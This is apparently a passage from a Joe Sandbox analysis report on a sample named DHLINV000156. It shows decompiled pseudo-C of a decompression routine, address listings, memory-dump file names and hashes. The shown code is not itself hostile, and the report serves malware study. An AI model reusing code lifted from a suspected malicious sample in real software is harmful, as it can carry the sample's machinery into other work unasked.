                                        											__eflags = __ebx - 0xe;
                                        											 *(__ebp - 0x2c) = __eax;
                                        											if(__ebx >= 0xe) {
                                        												__ebx = 0;
                                        												 *(__ebp - 0x48) = __ecx;
                                        												L103:
                                        												__eflags =  *(__ebp - 0x48);
                                        												if( *(__ebp - 0x48) <= 0) {
                                        													__eax = __eax + __ebx;
                                        													 *(__ebp - 0x40) = 4;
                                        													 *(__ebp - 0x2c) = __eax;
                                        													__eax =  *(__ebp - 4);
                                        													__eax =  *(__ebp - 4) + 0x644;
                                        													__eflags = __eax;
                                        													L109:
                                        													__ebx = 0;
                                        													 *(__ebp - 0x58) = __eax;
                                        													 *(__ebp - 0x50) = 1;
                                        													 *(__ebp - 0x44) = 0;
                                        													 *(__ebp - 0x48) = 0;
                                        													L113:
                                        													__eax =  *(__ebp - 0x40);
                                        													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                        													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                        														_t392 = __ebp - 0x2c;
                                        														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                        														__eflags =  *_t392;
                                        														goto L120;
                                        													}
                                        													__eax =  *(__ebp - 0x50);
                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        													__eax =  *(__ebp - 0x58);
                                        													__esi = __edi + __eax;
                                        													 *(__ebp - 0x54) = __esi;
                                        													__ax =  *__esi;
                                        													__ecx = __ax & 0x0000ffff;
                                        													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                        													__eflags =  *(__ebp - 0xc) - __edx;
                                        													if( *(__ebp - 0xc) >= __edx) {
                                        														__ecx = 0;
                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                        														__ecx = 1;
                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                        														__ebx = 1;
                                        														__ecx =  *(__ebp - 0x48);
                                        														__ebx = 1 << __cl;
                                        														__ecx = 1 << __cl;
                                        														__ebx =  *(__ebp - 0x44);
                                        														__ebx =  *(__ebp - 0x44) | __ecx;
                                        														__cx = __ax;
                                        														__cx = __ax >> 5;
                                        														__eax = __eax - __ecx;
                                        														__edi = __edi + 1;
                                        														__eflags = __edi;
                                        														 *(__ebp - 0x44) = __ebx;
                                        														 *__esi = __ax;
                                        														 *(__ebp - 0x50) = __edi;
                                        													} else {
                                        														 *(__ebp - 0x10) = __edx;
                                        														0x800 = 0x800 - __ecx;
                                        														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                        														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        														 *__esi = __dx;
                                        													}
                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                        														L112:
                                        														_t369 = __ebp - 0x48;
                                        														 *_t369 =  *(__ebp - 0x48) + 1;
                                        														__eflags =  *_t369;
                                        														goto L113;
                                        													} else {
                                        														goto L110;
                                        													}
                                        												}
                                        												__ecx =  *(__ebp - 0xc);
                                        												__ebx = __ebx + __ebx;
                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                        												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        												 *(__ebp - 0x44) = __ebx;
                                        												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                        													__ecx =  *(__ebp - 0x10);
                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                        													__ebx = __ebx | 0x00000001;
                                        													__eflags = __ebx;
                                        													 *(__ebp - 0x44) = __ebx;
                                        												}
                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                        													L102:
                                        													_t339 = __ebp - 0x48;
                                        													 *_t339 =  *(__ebp - 0x48) - 1;
                                        													__eflags =  *_t339;
                                        													goto L103;
                                        												} else {
                                        													goto L100;
                                        												}
                                        											}
                                        											__edx =  *(__ebp - 4);
                                        											__eax = __eax - __ebx;
                                        											 *(__ebp - 0x40) = __ecx;
                                        											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                        											goto L109;
                                        										case 0x1a:
                                        											L56:
                                        											__eflags =  *(__ebp - 0x64);
                                        											if( *(__ebp - 0x64) == 0) {
                                        												 *(__ebp - 0x88) = 0x1a;
                                        												goto L170;
                                        											}
                                        											__ecx =  *(__ebp - 0x68);
                                        											__al =  *(__ebp - 0x5c);
                                        											__edx =  *(__ebp - 8);
                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        											 *( *(__ebp - 0x68)) = __al;
                                        											__ecx =  *(__ebp - 0x14);
                                        											 *(__ecx +  *(__ebp - 8)) = __al;
                                        											__eax = __ecx + 1;
                                        											__edx = 0;
                                        											_t192 = __eax %  *(__ebp - 0x74);
                                        											__eax = __eax /  *(__ebp - 0x74);
                                        											__edx = _t192;
                                        											goto L80;
                                        										case 0x1b:
                                        											L76:
                                        											__eflags =  *(__ebp - 0x64);
                                        											if( *(__ebp - 0x64) == 0) {
                                        												 *(__ebp - 0x88) = 0x1b;
                                        												goto L170;
                                        											}
                                        											__eax =  *(__ebp - 0x14);
                                        											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        											__eflags = __eax -  *(__ebp - 0x74);
                                        											if(__eax >=  *(__ebp - 0x74)) {
                                        												__eax = __eax +  *(__ebp - 0x74);
                                        												__eflags = __eax;
                                        											}
                                        											__edx =  *(__ebp - 8);
                                        											__cl =  *(__eax + __edx);
                                        											__eax =  *(__ebp - 0x14);
                                        											 *(__ebp - 0x5c) = __cl;
                                        											 *(__eax + __edx) = __cl;
                                        											__eax = __eax + 1;
                                        											__edx = 0;
                                        											_t275 = __eax %  *(__ebp - 0x74);
                                        											__eax = __eax /  *(__ebp - 0x74);
                                        											__edx = _t275;
                                        											__eax =  *(__ebp - 0x68);
                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        											_t284 = __ebp - 0x64;
                                        											 *_t284 =  *(__ebp - 0x64) - 1;
                                        											__eflags =  *_t284;
                                        											 *( *(__ebp - 0x68)) = __cl;
                                        											L80:
                                        											 *(__ebp - 0x14) = __edx;
                                        											goto L81;
                                        										case 0x1c:
                                        											while(1) {
                                        												L124:
                                        												__eflags =  *(__ebp - 0x64);
                                        												if( *(__ebp - 0x64) == 0) {
                                        													break;
                                        												}
                                        												__eax =  *(__ebp - 0x14);
                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                        												__eflags = __eax -  *(__ebp - 0x74);
                                        												if(__eax >=  *(__ebp - 0x74)) {
                                        													__eax = __eax +  *(__ebp - 0x74);
                                        													__eflags = __eax;
                                        												}
                                        												__edx =  *(__ebp - 8);
                                        												__cl =  *(__eax + __edx);
                                        												__eax =  *(__ebp - 0x14);
                                        												 *(__ebp - 0x5c) = __cl;
                                        												 *(__eax + __edx) = __cl;
                                        												__eax = __eax + 1;
                                        												__edx = 0;
                                        												_t415 = __eax %  *(__ebp - 0x74);
                                        												__eax = __eax /  *(__ebp - 0x74);
                                        												__edx = _t415;
                                        												__eax =  *(__ebp - 0x68);
                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                        												__eflags =  *(__ebp - 0x30);
                                        												 *( *(__ebp - 0x68)) = __cl;
                                        												 *(__ebp - 0x14) = _t415;
                                        												if( *(__ebp - 0x30) > 0) {
                                        													continue;
                                        												} else {
                                        													L81:
                                        													 *(__ebp - 0x88) = 2;
                                        													goto L1;
                                        												}
                                        											}
                                        											 *(__ebp - 0x88) = 0x1c;
                                        											L170:
                                        											_push(0x22);
                                        											_pop(_t567);
                                        											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                        											_t535 = 0;
                                        											L172:
                                        											return _t535;
                                        									}
                                        								}
                                        								L171:
                                        								_t535 = _t534 | 0xffffffff;
                                        								goto L172;
                                        							}
                                        						}
                                        						__eax =  *(__ebp - 0x50);
                                        						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                        						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                        						__eax =  *(__ebp - 0x58);
                                        						__esi = __edx + __eax;
                                        						 *(__ebp - 0x54) = __esi;
                                        						__ax =  *__esi;
                                        						__edi = __ax & 0x0000ffff;
                                        						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                        						if( *(__ebp - 0xc) >= __ecx) {
                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                        							__cx = __ax;
                                        							__cx = __ax >> 5;
                                        							__eax = __eax - __ecx;
                                        							__edx = __edx + 1;
                                        							 *__esi = __ax;
                                        							 *(__ebp - 0x50) = __edx;
                                        						} else {
                                        							 *(__ebp - 0x10) = __ecx;
                                        							0x800 = 0x800 - __edi;
                                        							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                        							 *__esi = __cx;
                                        						}
                                        						if( *(__ebp - 0x10) >= 0x1000000) {
                                        							goto L148;
                                        						} else {
                                        							goto L146;
                                        						}
                                        					}
                                        					goto L1;
                                        				}
                                        			}








                                        0x00000000
                                        0x00406c9c
                                        0x00406c9c
                                        0x00406ca0
                                        0x00406cc5
                                        0x00406ccf
                                        0x00000000
                                        0x00406ca2
                                        0x00406ca2
                                        0x00406ca5
                                        0x00406ca9
                                        0x00406cac
                                        0x00406caf
                                        0x00406cb3
                                        0x00406cb3
                                        0x00406cb6
                                        0x00406d90
                                        0x00406d90
                                        0x00406d97
                                        0x00406d97
                                        0x00406d9a
                                        0x00406da1
                                        0x00406dce
                                        0x00406dd2
                                        0x00406e32
                                        0x00406e35
                                        0x00406e3a
                                        0x00406e3b
                                        0x00406e3d
                                        0x00406e3f
                                        0x00406e42
                                        0x00406d4e
                                        0x00406d4e
                                        0x00406d4e
                                        0x004064ea
                                        0x004064ea
                                        0x004064ea
                                        0x004064f3
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00000000
                                        0x00406504
                                        0x00000000
                                        0x00000000
                                        0x0040650d
                                        0x00406510
                                        0x00406513
                                        0x00406517
                                        0x00000000
                                        0x00000000
                                        0x0040651d
                                        0x00406520
                                        0x00406522
                                        0x00406523
                                        0x00406526
                                        0x00406528
                                        0x00406529
                                        0x0040652b
                                        0x0040652e
                                        0x00406533
                                        0x00406538
                                        0x00406541
                                        0x00406554
                                        0x00406557
                                        0x00406563
                                        0x0040658b
                                        0x0040658d
                                        0x0040659b
                                        0x0040659b
                                        0x0040659f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040658f
                                        0x0040658f
                                        0x00406592
                                        0x00406593
                                        0x00406593
                                        0x00000000
                                        0x0040658f
                                        0x00406569
                                        0x0040656e
                                        0x0040656e
                                        0x00406577
                                        0x0040657f
                                        0x00406582
                                        0x00000000
                                        0x00406588
                                        0x00406588
                                        0x00000000
                                        0x00406588
                                        0x00000000
                                        0x004065a5
                                        0x004065a5
                                        0x004065a9
                                        0x00406e55
                                        0x00000000
                                        0x00406e55
                                        0x004065b2
                                        0x004065c2
                                        0x004065c5
                                        0x004065c8
                                        0x004065c8
                                        0x004065c8
                                        0x004065cb
                                        0x004065cf
                                        0x00000000
                                        0x00000000
                                        0x004065d1
                                        0x004065d7
                                        0x00406601
                                        0x00406607
                                        0x0040660e
                                        0x00000000
                                        0x0040660e
                                        0x004065dd
                                        0x004065e0
                                        0x004065e5
                                        0x004065e5
                                        0x004065f0
                                        0x004065f8
                                        0x004065fb
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406640
                                        0x00406646
                                        0x00406649
                                        0x00406656
                                        0x0040665e
                                        0x00000000
                                        0x00000000
                                        0x00406615
                                        0x00406615
                                        0x00406619
                                        0x00406e64
                                        0x00000000
                                        0x00406e64
                                        0x00406625
                                        0x00406630
                                        0x00406630
                                        0x00406630
                                        0x00406633
                                        0x00406636
                                        0x00406639
                                        0x0040663e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406cd5
                                        0x00406cd5
                                        0x00406cdb
                                        0x00406ce1
                                        0x00406ce7
                                        0x00406d01
                                        0x00406d04
                                        0x00406d0a
                                        0x00406d15
                                        0x00406d15
                                        0x00406d17
                                        0x00406ce9
                                        0x00406ce9
                                        0x00406cf8
                                        0x00406cfc
                                        0x00406cfc
                                        0x00406d21
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406d23
                                        0x00406d27
                                        0x00406ed6
                                        0x00000000
                                        0x00406ed6
                                        0x00406d33
                                        0x00406d3a
                                        0x00406d42
                                        0x00406d45
                                        0x00406d48
                                        0x00406d48
                                        0x00000000
                                        0x00000000
                                        0x00406666
                                        0x00406668
                                        0x0040666b
                                        0x004066dc
                                        0x004066df
                                        0x004066e2
                                        0x004066e9
                                        0x004066f3
                                        0x00000000
                                        0x004066f3
                                        0x0040666d
                                        0x00406671
                                        0x00406674
                                        0x00406676
                                        0x00406679
                                        0x0040667c
                                        0x0040667e
                                        0x00406681
                                        0x00406683
                                        0x00406688
                                        0x0040668b
                                        0x0040668e
                                        0x00406692
                                        0x00406699
                                        0x0040669c
                                        0x004066a3
                                        0x004066a7
                                        0x004066af
                                        0x004066af
                                        0x004066af
                                        0x004066a9
                                        0x004066a9
                                        0x004066a9
                                        0x0040669e
                                        0x0040669e
                                        0x0040669e
                                        0x004066b3
                                        0x004066b6
                                        0x004066d4
                                        0x004066d6
                                        0x00000000
                                        0x004066b8
                                        0x004066b8
                                        0x004066bb
                                        0x004066be
                                        0x004066c1
                                        0x004066c3
                                        0x004066c3
                                        0x004066c3
                                        0x004066c6
                                        0x004066c9
                                        0x004066cb
                                        0x004066cc
                                        0x004066cf
                                        0x00000000
                                        0x004066cf
                                        0x00000000
                                        0x00406905
                                        0x00406909
                                        0x00406927
                                        0x0040692a
                                        0x00406931
                                        0x00406934
                                        0x00406937
                                        0x0040693a
                                        0x0040693d
                                        0x00406940
                                        0x00406942
                                        0x00406949
                                        0x0040694a
                                        0x0040694c
                                        0x0040694f
                                        0x00406952
                                        0x00406955
                                        0x00406955
                                        0x0040695a
                                        0x00000000
                                        0x0040695a
                                        0x0040690b
                                        0x0040690e
                                        0x00406911
                                        0x0040691b
                                        0x00000000
                                        0x00000000
                                        0x0040696f
                                        0x00406973
                                        0x00406996
                                        0x00406999
                                        0x0040699c
                                        0x004069a6
                                        0x00406975
                                        0x00406975
                                        0x00406978
                                        0x0040697b
                                        0x0040697e
                                        0x0040698b
                                        0x0040698e
                                        0x0040698e
                                        0x00000000
                                        0x00000000
                                        0x004069b2
                                        0x004069b6
                                        0x00000000
                                        0x00000000
                                        0x004069bc
                                        0x004069c0
                                        0x00000000
                                        0x00000000
                                        0x004069c6
                                        0x004069c8
                                        0x004069cc
                                        0x004069cc
                                        0x004069cf
                                        0x004069d3
                                        0x00000000
                                        0x00000000
                                        0x00406a23
                                        0x00406a27
                                        0x00406a2e
                                        0x00406a31
                                        0x00406a34
                                        0x00406a3e
                                        0x00000000
                                        0x00406a3e
                                        0x00406a29
                                        0x00000000
                                        0x00000000
                                        0x00406a4a
                                        0x00406a4e
                                        0x00406a55
                                        0x00406a58
                                        0x00406a5b
                                        0x00406a50
                                        0x00406a50
                                        0x00406a50
                                        0x00406a5e
                                        0x00406a61
                                        0x00406a64
                                        0x00406a64
                                        0x00406a67
                                        0x00406a6a
                                        0x00406a6d
                                        0x00406a6d
                                        0x00406a70
                                        0x00406a77
                                        0x00406a7c
                                        0x00000000
                                        0x00000000
                                        0x00406b0a
                                        0x00406b0a
                                        0x00406b0e
                                        0x00406eac
                                        0x00000000
                                        0x00406eac
                                        0x00406b14
                                        0x00406b17
                                        0x00406b1a
                                        0x00406b1e
                                        0x00406b21
                                        0x00406b27
                                        0x00406b29
                                        0x00406b29
                                        0x00406b29
                                        0x00406b2c
                                        0x00406b2f
                                        0x00000000
                                        0x00000000
                                        0x004066ff
                                        0x004066ff
                                        0x00406703
                                        0x00406e70
                                        0x00000000
                                        0x00406e70
                                        0x00406709
                                        0x0040670c
                                        0x0040670f
                                        0x00406713
                                        0x00406716
                                        0x0040671c
                                        0x0040671e
                                        0x0040671e
                                        0x0040671e
                                        0x00406721
                                        0x00406724
                                        0x00406724
                                        0x00406727
                                        0x0040672a
                                        0x00000000
                                        0x00000000
                                        0x00406730
                                        0x00406736
                                        0x00000000
                                        0x00000000
                                        0x0040673c
                                        0x0040673c
                                        0x00406740
                                        0x00406743
                                        0x00406746
                                        0x00406749
                                        0x0040674c
                                        0x0040674d
                                        0x00406750
                                        0x00406752
                                        0x00406758
                                        0x0040675b
                                        0x0040675e
                                        0x00406761
                                        0x00406764
                                        0x00406767
                                        0x0040676a
                                        0x00406786
                                        0x00406789
                                        0x0040678c
                                        0x0040678f
                                        0x00406796
                                        0x0040679a
                                        0x0040679c
                                        0x004067a0
                                        0x0040676c
                                        0x0040676c
                                        0x00406770
                                        0x00406778
                                        0x0040677d
                                        0x0040677f
                                        0x00406781
                                        0x00406781
                                        0x004067a3
                                        0x004067aa
                                        0x004067ad
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b3
                                        0x00000000
                                        0x004067b8
                                        0x004067b8
                                        0x004067bc
                                        0x00406e7c
                                        0x00000000
                                        0x00406e7c
                                        0x004067c2
                                        0x004067c5
                                        0x004067c8
                                        0x004067cc
                                        0x004067cf
                                        0x004067d5
                                        0x004067d7
                                        0x004067d7
                                        0x004067d7
                                        0x004067da
                                        0x004067dd
                                        0x004067dd
                                        0x004067dd
                                        0x004067e3
                                        0x00000000
                                        0x00000000
                                        0x004067e5
                                        0x004067e8
                                        0x004067eb
                                        0x004067ee
                                        0x004067f1
                                        0x004067f4
                                        0x004067f7
                                        0x004067fa
                                        0x004067fd
                                        0x00406800
                                        0x00406803
                                        0x0040681b
                                        0x0040681e
                                        0x00406821
                                        0x00406824
                                        0x00406824
                                        0x00406827
                                        0x0040682b
                                        0x0040682d
                                        0x00406805
                                        0x00406805
                                        0x0040680d
                                        0x00406812
                                        0x00406814
                                        0x00406816
                                        0x00406816
                                        0x00406830
                                        0x00406837
                                        0x0040683a
                                        0x00000000
                                        0x0040683c
                                        0x00000000
                                        0x0040683c
                                        0x0040683a
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00406841
                                        0x00000000
                                        0x00000000
                                        0x0040687c
                                        0x0040687c
                                        0x00406880
                                        0x00406e88
                                        0x00000000
                                        0x00406e88
                                        0x00406886
                                        0x00406889
                                        0x0040688c
                                        0x00406890
                                        0x00406893
                                        0x00406899
                                        0x0040689b
                                        0x0040689b
                                        0x0040689b
                                        0x0040689e
                                        0x004068a1
                                        0x004068a1
                                        0x004068a7
                                        0x00406845
                                        0x00406845
                                        0x00406848
                                        0x00000000
                                        0x00406848
                                        0x004068a9
                                        0x004068a9
                                        0x004068ac
                                        0x004068af
                                        0x004068b2
                                        0x004068b5
                                        0x004068b8
                                        0x004068bb
                                        0x004068be
                                        0x004068c1
                                        0x004068c4
                                        0x004068c7
                                        0x004068df
                                        0x004068e2
                                        0x004068e5
                                        0x004068e8
                                        0x004068e8
                                        0x004068eb
                                        0x004068ef
                                        0x004068f1
                                        0x004068c9
                                        0x004068c9
                                        0x004068d1
                                        0x004068d6
                                        0x004068d8
                                        0x004068da
                                        0x004068da
                                        0x004068f4
                                        0x004068fb
                                        0x004068fe
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406900
                                        0x00000000
                                        0x00406b8d
                                        0x00406b8d
                                        0x00406b91
                                        0x00406eb8
                                        0x00000000
                                        0x00406eb8
                                        0x00406b97
                                        0x00406b9a
                                        0x00406b9d
                                        0x00406ba1
                                        0x00406ba4
                                        0x00406baa
                                        0x00406bac
                                        0x00406bac
                                        0x00406bac
                                        0x00406baf
                                        0x00000000
                                        0x00000000
                                        0x0040695d
                                        0x0040695d
                                        0x00406960
                                        0x00406cd2
                                        0x00406cd2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406d59
                                        0x00406d5d
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d7b
                                        0x00406d82
                                        0x00406d89
                                        0x00000000
                                        0x00406d89
                                        0x00406d5f
                                        0x00406d62
                                        0x00406d65
                                        0x00406d68
                                        0x00406d6f
                                        0x00000000
                                        0x00000000
                                        0x00406e4a
                                        0x00406e4d
                                        0x00406d4e
                                        0x00406d4e
                                        0x00000000
                                        0x00000000
                                        0x00406a84
                                        0x00406a86
                                        0x00406a8d
                                        0x00406a8e
                                        0x00406a90
                                        0x00406a93
                                        0x00000000
                                        0x00000000
                                        0x00406a9b
                                        0x00406a9e
                                        0x00406aa1
                                        0x00406aa3
                                        0x00406aa5
                                        0x00406aa5
                                        0x00406aa6
                                        0x00406aa9
                                        0x00406ab0
                                        0x00406ab3
                                        0x00406ac1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00406da6
                                        0x00406da6
                                        0x00406daa
                                        0x00406ee2
                                        0x00000000
                                        0x00406ee2
                                        0x00406db0
                                        0x00406db3
                                        0x00406db6
                                        0x00406dba
                                        0x00406dbd
                                        0x00406dc3
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc5
                                        0x00406dc8
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00406dcb
                                        0x00000000
                                        0x00000000
                                        0x00406ac9
                                        0x00406acc
                                        0x00406b02
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c32
                                        0x00406c35
                                        0x00406c35
                                        0x00406c38
                                        0x00406c3a
                                        0x00406ec4
                                        0x00000000
                                        0x00406ec4
                                        0x00406c40
                                        0x00406c43
                                        0x00000000
                                        0x00000000
                                        0x00406c49
                                        0x00406c4d
                                        0x00406c50
                                        0x00406c50
                                        0x00406c50
                                        0x00000000
                                        0x00406c50
                                        0x00406ace
                                        0x00406ad0
                                        0x00406ad2
                                        0x00406ad4
                                        0x00406ad7
                                        0x00406ad8
                                        0x00406ada
                                        0x00406adc
                                        0x00406adf
                                        0x00406ae2
                                        0x00406af8
                                        0x00406afd
                                        0x00406b35
                                        0x00406b35
                                        0x00406b39
                                        0x00406b65
                                        0x00406b67
                                        0x00406b6e
                                        0x00406b71
                                        0x00406b74
                                        0x00406b74
                                        0x00406b79
                                        0x00406b79
                                        0x00406b7b
                                        0x00406b7e
                                        0x00406b85
                                        0x00406b88
                                        0x00406bb5
                                        0x00406bb5
                                        0x00406bb8
                                        0x00406bbb
                                        0x00406c2f
                                        0x00406c2f
                                        0x00406c2f
                                        0x00000000
                                        0x00406c2f
                                        0x00406bbd
                                        0x00406bc3
                                        0x00406bc6
                                        0x00406bc9
                                        0x00406bcc
                                        0x00406bcf
                                        0x00406bd2
                                        0x00406bd5
                                        0x00406bd8
                                        0x00406bdb
                                        0x00406bde
                                        0x00406bf7
                                        0x00406bf9
                                        0x00406bfc
                                        0x00406bfd
                                        0x00406c00
                                        0x00406c02
                                        0x00406c05
                                        0x00406c07
                                        0x00406c09
                                        0x00406c0c
                                        0x00406c0e
                                        0x00406c11
                                        0x00406c15
                                        0x00406c17
                                        0x00406c17
                                        0x00406c18
                                        0x00406c1b
                                        0x00406c1e
                                        0x00406be0
                                        0x00406be0
                                        0x00406be8
                                        0x00406bed
                                        0x00406bef
                                        0x00406bf2
                                        0x00406bf2
                                        0x00406c21
                                        0x00406c28
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00406bb2
                                        0x00000000
                                        0x00406c2a
                                        0x00000000
                                        0x00406c2a
                                        0x00406c28
                                        0x00406b3b
                                        0x00406b3e
                                        0x00406b40
                                        0x00406b43
                                        0x00406b46
                                        0x00406b49
                                        0x00406b4b
                                        0x00406b4e
                                        0x00406b51
                                        0x00406b51
                                        0x00406b54
                                        0x00406b54
                                        0x00406b57
                                        0x00406b5e
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00406b32
                                        0x00000000
                                        0x00406b60
                                        0x00000000
                                        0x00406b60
                                        0x00406b5e
                                        0x00406ae4
                                        0x00406ae7
                                        0x00406ae9
                                        0x00406aec
                                        0x00000000
                                        0x00000000
                                        0x0040684b
                                        0x0040684b
                                        0x0040684f
                                        0x00406e94
                                        0x00000000
                                        0x00406e94
                                        0x00406855
                                        0x00406858
                                        0x0040685b
                                        0x0040685e
                                        0x00406861
                                        0x00406864
                                        0x00406867
                                        0x00406869
                                        0x0040686c
                                        0x0040686f
                                        0x00406872
                                        0x00406874
                                        0x00406874
                                        0x00406874
                                        0x00000000
                                        0x00000000
                                        0x004069d6
                                        0x004069d6
                                        0x004069da
                                        0x00406ea0
                                        0x00000000
                                        0x00406ea0
                                        0x004069e0
                                        0x004069e3
                                        0x004069e6
                                        0x004069e9
                                        0x004069eb
                                        0x004069eb
                                        0x004069eb
                                        0x004069ee
                                        0x004069f1
                                        0x004069f4
                                        0x004069f7
                                        0x004069fa
                                        0x004069fd
                                        0x004069fe
                                        0x00406a00
                                        0x00406a00
                                        0x00406a00
                                        0x00406a03
                                        0x00406a06
                                        0x00406a09
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0c
                                        0x00406a0f
                                        0x00406a11
                                        0x00406a11
                                        0x00000000
                                        0x00000000
                                        0x00406c53
                                        0x00406c53
                                        0x00406c53
                                        0x00406c57
                                        0x00000000
                                        0x00000000
                                        0x00406c5d
                                        0x00406c60
                                        0x00406c63
                                        0x00406c66
                                        0x00406c68
                                        0x00406c68
                                        0x00406c68
                                        0x00406c6b
                                        0x00406c6e
                                        0x00406c71
                                        0x00406c74
                                        0x00406c77
                                        0x00406c7a
                                        0x00406c7b
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c7d
                                        0x00406c80
                                        0x00406c83
                                        0x00406c86
                                        0x00406c89
                                        0x00406c8c
                                        0x00406c90
                                        0x00406c92
                                        0x00406c95
                                        0x00000000
                                        0x00406c97
                                        0x00406a14
                                        0x00406a14
                                        0x00000000
                                        0x00406a14
                                        0x00406c95
                                        0x00406eca
                                        0x00406eec
                                        0x00406ef2
                                        0x00406ef4
                                        0x00406efb
                                        0x00406efd
                                        0x00406f04
                                        0x00406f08
                                        0x00000000
                                        0x004064f9
                                        0x00406f01
                                        0x00406f01
                                        0x00000000
                                        0x00406f01
                                        0x00406d4e
                                        0x00406dd4
                                        0x00406dda
                                        0x00406ddd
                                        0x00406de0
                                        0x00406de3
                                        0x00406de6
                                        0x00406de9
                                        0x00406dec
                                        0x00406def
                                        0x00406df5
                                        0x00406e0e
                                        0x00406e11
                                        0x00406e14
                                        0x00406e17
                                        0x00406e1b
                                        0x00406e1d
                                        0x00406e1e
                                        0x00406e21
                                        0x00406df7
                                        0x00406df7
                                        0x00406dff
                                        0x00406e04
                                        0x00406e06
                                        0x00406e09
                                        0x00406e09
                                        0x00406e2b
                                        0x00000000
                                        0x00406e2d
                                        0x00000000
                                        0x00406e2d
                                        0x00406e2b
                                        0x00000000
                                        0x00406ca0

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
                                        • Instruction ID: 08e1f0bd3e012b2653e952fb076f5459688999f8fa16d8000732ef154d800f7e
                                        • Opcode Fuzzy Hash: 48eeb96149e0d88395d78aa931bb38ded32ae5716a52e0a7ec155fc571e56ba0
                                        • Instruction Fuzzy Hash: 53912370E00229CBEF28CF98C8547ADBBB1FF44305F15816AD956BB281C7789A96DF44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E004069B2() {
                                        				unsigned short _t532;
